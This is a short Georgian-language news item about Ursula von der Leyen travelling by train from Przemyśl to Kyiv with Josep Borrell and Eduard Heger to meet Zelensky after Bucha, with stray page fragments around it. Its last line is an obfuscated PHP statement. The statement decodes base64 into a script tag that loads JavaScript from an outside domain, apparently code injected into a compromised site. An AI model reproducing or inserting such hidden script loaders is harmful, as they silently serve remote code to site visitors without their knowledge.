celsiusi
ავერსი შნაიდერი
ევროკომისიის პრეზიდენტი ურსულა ფონ დერ ლაიენი უკრაინის დედაქალაქ კიევში გაემგზავრა.
 
როგორც „დოიჩე ველე“ იუწყება, პრეზიდენტი ფონ დერ ლაიენი კიევში უკრაინის საზღვრის სიახლოვეს მდებარე პოლონურ ქალაქ ფშემისლიდან მატარებლით გაემგზავრა. დელეგაციის წევრთა შორის ასევე არიან საგარეო პოლიტიკისა და უსაფრთხოების საკითხებში ევროკავშირის უმაღლესი წარმომადგენელი ჯოზეფ ბორელი, სლოვაკეთის პრემიერ-მინისტრი ედუარდ ჰეგერი და ევროპარლამენტართა ნაწილი.
 
დაგეგმილია, რომ კიევში ურსულა ფონ დერ ლაიენი უკრაინის პრეზიდენტ ვოლოდიმირ ზელენსკის შეხვდება.
 
ცნობისთვის, ურსულა ფონ დრე ლაიენი პირველი ევროპელი მაღალჩინოსანია, რომელიც უკრაინაში ბუჩაში მომხდარის შემდეგ ჩადის.
657
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");